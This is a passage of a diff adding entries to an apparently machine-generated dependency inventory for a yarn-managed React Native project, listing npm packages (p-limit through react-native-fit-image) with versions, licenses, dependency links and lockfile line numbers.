"fef5d5d4a7c9549b" + }, + "Version": "5.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bl@4.1.0", + "chalk@4.1.2", + "cli-cursor@3.1.0", + "cli-spinners@2.9.2", + "is-interactive@1.0.0", + "is-unicode-supported@0.1.0", + "log-symbols@4.1.0", + "strip-ansi@6.0.1", + "wcwidth@1.0.1" + ], + "Locations": [ + { + "StartLine": 8346, + "EndLine": 8359 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-limit@2.3.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@2.3.0", + "UID": "18a5b86bd5b93076" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-try@2.2.0" + ], + "Locations": [ + { + "StartLine": 8377, + "EndLine": 8382 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-limit@3.1.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@3.1.0", + "UID": "7668e669944cebf0" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yocto-queue@0.1.0" + ], + "Locations": [ + { + "StartLine": 8384, + "EndLine": 8389 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-locate@3.0.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@3.0.0", + "UID": "db24b80c54867b1a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@2.3.0" + ], + "Locations": [ + { + "StartLine": 8391, + "EndLine": 8396 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-locate@4.1.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@4.1.0", + "UID": "2cbd29f4b7594691" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@2.3.0" + ], + "Locations": [ + { + "StartLine": 8398, + "EndLine": 8403 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-locate@5.0.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@5.0.0", + "UID": "c9af6ec248cdc27d" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "p-limit@3.1.0" + ], + "Locations": [ + { + "StartLine": 8405, + "EndLine": 8410 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-map@7.0.3", + "Name": "p-map", + "Identifier": { + "PURL": "pkg:npm/p-map@7.0.3", + "UID": "55728e1e311d41b9" + }, + "Version": "7.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8419, + "EndLine": 8420 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-try@2.2.0", + "Name": "p-try", + "Identifier": { + "PURL": "pkg:npm/p-try@2.2.0", + "UID": "825647d8b08de80e" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8422, + "EndLine": 8425 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "package-json-from-dist@1.0.1", + "Name": "package-json-from-dist", + "Identifier": { + "PURL": "pkg:npm/package-json-from-dist@1.0.1", + "UID": "d72de3a81351229" + }, + "Version": "1.0.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8427, + "EndLine": 8430 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "pacote@21.0.3", + "Name": "pacote", + "Identifier": { + "PURL": "pkg:npm/pacote@21.0.3", + "UID": "c3751a7657620ecb" + }, + "Version": "21.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/git@7.0.0", + "@npmcli/installed-package-contents@3.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/promise-spawn@8.0.3", + "@npmcli/run-script@10.0.0", + "cacache@20.0.1", + "fs-minipass@3.0.3", + "minipass@7.1.2", + "npm-package-arg@13.0.1", + "npm-packlist@10.0.2", + "npm-pick-manifest@11.0.1", + "npm-registry-fetch@19.0.0", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "sigstore@4.0.0", + "ssri@12.0.0", + "tar@7.5.1" + ], + "Locations": [ + { + "StartLine": 8432, + "EndLine": 8451 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "parent-module@1.0.1", + "Name": "parent-module", + "Identifier": { + "PURL": "pkg:npm/parent-module@1.0.1", + "UID": "1b91838d551b4bcb" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "callsites@3.1.0" + ], + "Locations": [ + { + "StartLine": 8453, + "EndLine": 8458 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "parse-conflict-json@4.0.0", + "Name": "parse-conflict-json", + "Identifier": { + "PURL": "pkg:npm/parse-conflict-json@4.0.0", + "UID": "4479a56c5854e7ce" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "json-parse-even-better-errors@4.0.0", + "just-diff@6.0.2", + "just-diff-apply@5.5.0" + ], + "Locations": [ + { + "StartLine": 8460, + "EndLine": 8465 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "parse-json@5.2.0", + "Name": "parse-json", + "Identifier": { + "PURL": "pkg:npm/parse-json@5.2.0", + "UID": "8382c6b9d49b29de" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "error-ex@1.3.4", + "json-parse-even-better-errors@2.3.1", + "lines-and-columns@1.2.4" + ], + "Locations": [ + { + "StartLine": 8467, + "EndLine": 8475 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "parseurl@1.3.3", + "Name": "parseurl", + "Identifier": { + "PURL": "pkg:npm/parseurl@1.3.3", + "UID": "540b9fcf8360c6da" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8477, + "EndLine": 8480 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-dirname@1.0.2", + "Name": "path-dirname", + "Identifier": { + "PURL": "pkg:npm/path-dirname@1.0.2", + "UID": "72e0c8578115bbcd" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8502, + "EndLine": 8505 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-exists@3.0.0", + "Name": "path-exists", + "Identifier": { + "PURL": "pkg:npm/path-exists@3.0.0", + "UID": "de215f073da25b38" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8507, + "EndLine": 8510 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-exists@4.0.0", + "Name": "path-exists", + "Identifier": { + "PURL": "pkg:npm/path-exists@4.0.0", + "UID": "458135f8fff146f" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8512, + "EndLine": 8515 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-extra@1.0.3", + "Name": "path-extra", + "Identifier": { + "PURL": "pkg:npm/path-extra@1.0.3", + "UID": "f930545cafc31a22" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8517, + "EndLine": 8520 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-is-absolute@1.0.1", + "Name": "path-is-absolute", + "Identifier": { + "PURL": "pkg:npm/path-is-absolute@1.0.1", + "UID": "95533b125f16e247" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8522, + "EndLine": 8525 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-key@3.1.1", + "Name": "path-key", + "Identifier": { + "PURL": "pkg:npm/path-key@3.1.1", + "UID": "605dc4a8167b4221" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8527, + "EndLine": 8530 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-parse@1.0.7", + "Name": "path-parse", + "Identifier": { + "PURL": "pkg:npm/path-parse@1.0.7", + "UID": "e06cff8c5d872f35" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8532, + "EndLine": 8535 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-scurry@1.11.1", + "Name": "path-scurry", + "Identifier": { + "PURL": "pkg:npm/path-scurry@1.11.1", + "UID": "defd855add97f503" + }, + "Version": "1.11.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@10.4.3", + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 8537, + "EndLine": 8543 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-scurry@2.0.0", + "Name": "path-scurry", + "Identifier": { + "PURL": "pkg:npm/path-scurry@2.0.0", + "UID": "633250ebcb0100e7" + }, + "Version": "2.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@11.2.2", + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 8545, + "EndLine": 8549 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "path-type@4.0.0", + "Name": "path-type", + "Identifier": { + "PURL": "pkg:npm/path-type@4.0.0", + "UID": "89bc8cee7c188a98" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8551, + "EndLine": 8554 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "paths-js@0.4.11", + "Name": "paths-js", + "Identifier": { + "PURL": "pkg:npm/paths-js@0.4.11", + "UID": "63d51af71a92501d" + }, + "Version": "0.4.11", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8556, + "EndLine": 8559 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "picocolors@1.1.1", + "Name": "picocolors", + "Identifier": { + "PURL": "pkg:npm/picocolors@1.1.1", + "UID": "57417cdf80cf1f6a" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8561, + "EndLine": 8564 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "picomatch@2.3.1", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@2.3.1", + "UID": "a3727870b0227353" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8566, + "EndLine": 8569 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "picomatch@4.0.3", + "Name": "picomatch", + "Identifier": { + "PURL": "pkg:npm/picomatch@4.0.3", + "UID": "166fd27b204f47e7" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8571, + "EndLine": 8574 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "pirates@4.0.7", + "Name": "pirates", + "Identifier": { + "PURL": "pkg:npm/pirates@4.0.7", + "UID": "bb4bd308e87efd6b" + }, + "Version": "4.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8576, + "EndLine": 8579 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "pkg-up@3.1.0", + "Name": "pkg-up", + "Identifier": { + "PURL": "pkg:npm/pkg-up@3.1.0", + "UID": "d131eb564d276b31" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "find-up@3.0.0" + ], + "Locations": [ + { + "StartLine": 8588, + "EndLine": 8593 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "plist@3.1.0", + "Name": "plist", + "Identifier": { + "PURL": "pkg:npm/plist@3.1.0", + "UID": "592e948586eab495" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@xmldom/xmldom@0.8.11", + "base64-js@1.5.1", + "xmlbuilder@15.1.1" + ], + "Locations": [ + { + "StartLine": 8595, + "EndLine": 8602 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "point-in-polygon@1.1.0", + "Name": "point-in-polygon", + "Identifier": { + "PURL": "pkg:npm/point-in-polygon@1.1.0", + "UID": "8a14a3d3b47ad437" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8604, + "EndLine": 8607 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "possible-typed-array-names@1.1.0", + "Name": "possible-typed-array-names", + "Identifier": { + "PURL": "pkg:npm/possible-typed-array-names@1.1.0", + "UID": "7c8c305b56412cb1" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8609, + "EndLine": 8612 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "postcss-selector-parser@7.1.0", + "Name": "postcss-selector-parser", + "Identifier": { + "PURL": "pkg:npm/postcss-selector-parser@7.1.0", + "UID": "b0e637f9ffefe1ce" + }, + "Version": "7.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cssesc@3.0.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 8614, + "EndLine": 8618 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "postcss-value-parser@4.2.0", + "Name": "postcss-value-parser", + "Identifier": { + "PURL": "pkg:npm/postcss-value-parser@4.2.0", + "UID": "6123a3742980ddc6" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8620, + "EndLine": 8623 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "prebuild-install@7.1.3", + "Name": "prebuild-install", + "Identifier": { + "PURL": "pkg:npm/prebuild-install@7.1.3", + "UID": "40a011085d703d7b" + }, + "Version": "7.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "detect-libc@2.1.2", + "expand-template@2.0.3", + "github-from-package@0.0.0", + "minimist@1.2.8", + "mkdirp-classic@0.5.3", + "napi-build-utils@2.0.0", + "node-abi@3.78.0", + "pump@3.0.3", + "rc@1.2.8", + "simple-get@4.0.1", + "tar-fs@2.1.4", + "tunnel-agent@0.6.0" + ], + "Locations": [ + { + "StartLine": 8630, + "EndLine": 8646 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "prettier@3.6.2", + "Name": "prettier", + "Identifier": { + "PURL": "pkg:npm/prettier@3.6.2", + "UID": "26abbb0128933167" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8653, + "EndLine": 8656 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "pretty-format@29.7.0", + "Name": "pretty-format", + "Identifier": { + "PURL": "pkg:npm/pretty-format@29.7.0", + "UID": "81d1d262e9404249" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/schemas@29.6.3", + "ansi-styles@5.2.0", + "react-is@18.3.1" + ], + "Locations": [ + { + "StartLine": 8663, + "EndLine": 8670 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "proc-log@5.0.0", + "Name": "proc-log", + "Identifier": { + "PURL": "pkg:npm/proc-log@5.0.0", + "UID": "2f3285f7af06e022" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8672, + "EndLine": 8673 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "process@0.11.10", + "Name": "process", + "Identifier": { + "PURL": "pkg:npm/process@0.11.10", + "UID": "984aaf56e8ebaf7e" + }, + "Version": "0.11.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8680, + "EndLine": 8683 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "process-nextick-args@2.0.1", + "Name": "process-nextick-args", + "Identifier": { + "PURL": "pkg:npm/process-nextick-args@2.0.1", + "UID": "f0a683b899f8ebec" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8675, + "EndLine": 8678 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "proggy@3.0.0", + "Name": "proggy", + "Identifier": { + "PURL": "pkg:npm/proggy@3.0.0", + "UID": "c9ad2b54fa672279" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8685, + "EndLine": 8686 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promise@7.3.1", + "Name": "promise", + "Identifier": { + "PURL": "pkg:npm/promise@7.3.1", + "UID": "2a3de558d805f70c" + }, + "Version": "7.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asap@2.0.6" + ], + "Locations": [ + { + "StartLine": 8711, + "EndLine": 8716 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promise@8.3.0", + "Name": "promise", + "Identifier": { + "PURL": "pkg:npm/promise@8.3.0", + "UID": "120d13e6275706af" + }, + "Version": "8.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asap@2.0.6" + ], + "Locations": [ + { + "StartLine": 8718, + "EndLine": 8723 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promise-all-reject-late@1.0.1", + "Name": "promise-all-reject-late", + "Identifier": { + "PURL": "pkg:npm/promise-all-reject-late@1.0.1", + "UID": "d0c253c9932f550b" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8688, + "EndLine": 8691 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promise-call-limit@3.0.2", + "Name": "promise-call-limit", + "Identifier": { + "PURL": "pkg:npm/promise-call-limit@3.0.2", + "UID": "126249345f75af32" + }, + "Version": "3.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8693, + "EndLine": 8696 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promise-retry@2.0.1", + "Name": "promise-retry", + "Identifier": { + "PURL": "pkg:npm/promise-retry@2.0.1", + "UID": "57a1e6055cbc1108" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "err-code@2.0.3", + "retry@0.12.0" + ], + "Locations": [ + { + "StartLine": 8703, + "EndLine": 8709 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "prompts@2.4.2", + "Name": "prompts", + "Identifier": { + "PURL": "pkg:npm/prompts@2.4.2", + "UID": "b7bad1513367e92e" + }, + "Version": "2.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "kleur@3.0.3", + "sisteransi@1.0.5" + ], + "Locations": [ + { + "StartLine": 8725, + "EndLine": 8731 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promzard@2.0.0", + "Name": "promzard", + "Identifier": { + "PURL": "pkg:npm/promzard@2.0.0", + "UID": "2cabb0a039071a47" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "read@4.1.0" + ], + "Locations": [ + { + "StartLine": 8733, + "EndLine": 8736 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "prop-types@15.8.1", + "Name": "prop-types", + "Identifier": { + "PURL": "pkg:npm/prop-types@15.8.1", + "UID": "4d79e943b9efb988" + }, + "Version": "15.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0", + "object-assign@4.1.1", + "react-is@16.13.1" + ], + "Locations": [ + { + "StartLine": 8738, + "EndLine": 8745 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "protobufjs@7.5.4", + "Name": "protobufjs", + "Identifier": { + "PURL": "pkg:npm/protobufjs@7.5.4", + "UID": "4bd1bebf607e950b" + }, + "Version": "7.5.4", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@protobufjs/aspromise@1.1.2", + "@protobufjs/base64@1.1.2", + "@protobufjs/codegen@2.0.4", + "@protobufjs/eventemitter@1.1.0", + "@protobufjs/fetch@1.1.0", + "@protobufjs/float@1.0.2", + "@protobufjs/inquire@1.1.0", + "@protobufjs/path@1.1.2", + "@protobufjs/pool@1.1.0", + "@protobufjs/utf8@1.1.0", + "@types/node@24.7.0", + "long@5.3.2" + ], + "Locations": [ + { + "StartLine": 8747, + "EndLine": 8763 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "proxy-from-env@1.1.0", + "Name": "proxy-from-env", + "Identifier": { + "PURL": "pkg:npm/proxy-from-env@1.1.0", + "UID": "969b50a9103235c1" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8765, + "EndLine": 8768 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "pump@3.0.3", + "Name": "pump", + "Identifier": { + "PURL": "pkg:npm/pump@3.0.3", + "UID": "33bb2868dc30d48d" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "end-of-stream@1.4.5", + "once@1.4.0" + ], + "Locations": [ + { + "StartLine": 8770, + "EndLine": 8776 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "qrcode-terminal@0.12.0", + "Name": "qrcode-terminal", + "Identifier": { + "PURL": "pkg:npm/qrcode-terminal@0.12.0", + "UID": "9a188c808a075609" + }, + "Version": "0.12.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8788, + "EndLine": 8791 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "query-string@7.1.3", + "Name": "query-string", + "Identifier": { + "PURL": "pkg:npm/query-string@7.1.3", + "UID": "d87934e03912518f" + }, + "Version": "7.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decode-uri-component@0.2.2", + "filter-obj@1.1.0", + "split-on-first@1.1.0", + "strict-uri-encode@2.0.0" + ], + "Locations": [ + { + "StartLine": 8800, + "EndLine": 8808 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "queue@6.0.2", + "Name": "queue", + "Identifier": { + "PURL": "pkg:npm/queue@6.0.2", + "UID": "abcc7152b78d0bd5" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4" + ], + "Locations": [ + { + "StartLine": 8815, + "EndLine": 8820 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "queue-microtask@1.2.3", + "Name": "queue-microtask", + "Identifier": { + "PURL": "pkg:npm/queue-microtask@1.2.3", + "UID": "b66500e9fdae917f" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8810, + "EndLine": 8813 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "quick-lru@4.0.1", + "Name": "quick-lru", + "Identifier": { + "PURL": "pkg:npm/quick-lru@4.0.1", + "UID": "583c5dc5fb027f1e" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8822, + "EndLine": 8825 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "range-parser@1.2.1", + "Name": "range-parser", + "Identifier": { + "PURL": "pkg:npm/range-parser@1.2.1", + "UID": "cd5b66b98def0a23" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8827, + "EndLine": 8830 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "rc@1.2.8", + "Name": "rc", + "Identifier": { + "PURL": "pkg:npm/rc@1.2.8", + "UID": "39f7d6041172448e" + }, + "Version": "1.2.8", + "Licenses": [ + "(BSD-2-Clause OR MIT OR Apache-2.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "deep-extend@0.6.0", + "ini@1.3.8", + "minimist@1.2.8", + "strip-json-comments@2.0.1" + ], + "Locations": [ + { + "StartLine": 8842, + "EndLine": 8850 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-addons-shallow-compare@15.6.2", + "Name": "react-addons-shallow-compare", + "Identifier": { + "PURL": "pkg:npm/react-addons-shallow-compare@15.6.2", + "UID": "5ac6eb7c891902e" + }, + "Version": "15.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fbjs@0.8.18", + "object-assign@4.1.1" + ], + "Locations": [ + { + "StartLine": 8852, + "EndLine": 8858 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-devtools-core@6.1.5", + "Name": "react-devtools-core", + "Identifier": { + "PURL": "pkg:npm/react-devtools-core@6.1.5", + "UID": "eb9eb72f359cc05a" + }, + "Version": "6.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "shell-quote@1.8.3", + "ws@7.5.10" + ], + "Locations": [ + { + "StartLine": 8860, + "EndLine": 8866 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-freeze@1.0.4", + "Name": "react-freeze", + "Identifier": { + "PURL": "pkg:npm/react-freeze@1.0.4", + "UID": "bba332ce569879cf" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8868, + "EndLine": 8871 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-is@16.13.1", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@16.13.1", + "UID": "f3504d5384233908" + }, + "Version": "16.13.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8873, + "EndLine": 8876 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-is@18.3.1", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@18.3.1", + "UID": "ad8da2c097afc1ec" + }, + "Version": "18.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8883, + "EndLine": 8886 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-is@19.2.4", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@19.2.4", + "UID": "36dffa4415a29c59" + }, + "Version": "19.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8888, + "EndLine": 8891 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-animatable@1.4.0", + "Name": "react-native-animatable", + "Identifier": { + "PURL": "pkg:npm/react-native-animatable@1.4.0", + "UID": "9567a240de174a54" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 8893, + "EndLine": 8898 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-drawer-layout@4.1.13", + "Name": "react-native-drawer-layout", + "Identifier": { + "PURL": "pkg:npm/react-native-drawer-layout@4.1.13", + "UID": "e4cc849a2b05270e" + }, + "Version": "4.1.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 8984, + "EndLine": 8989 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-fit-image@1.5.5", + "Name": 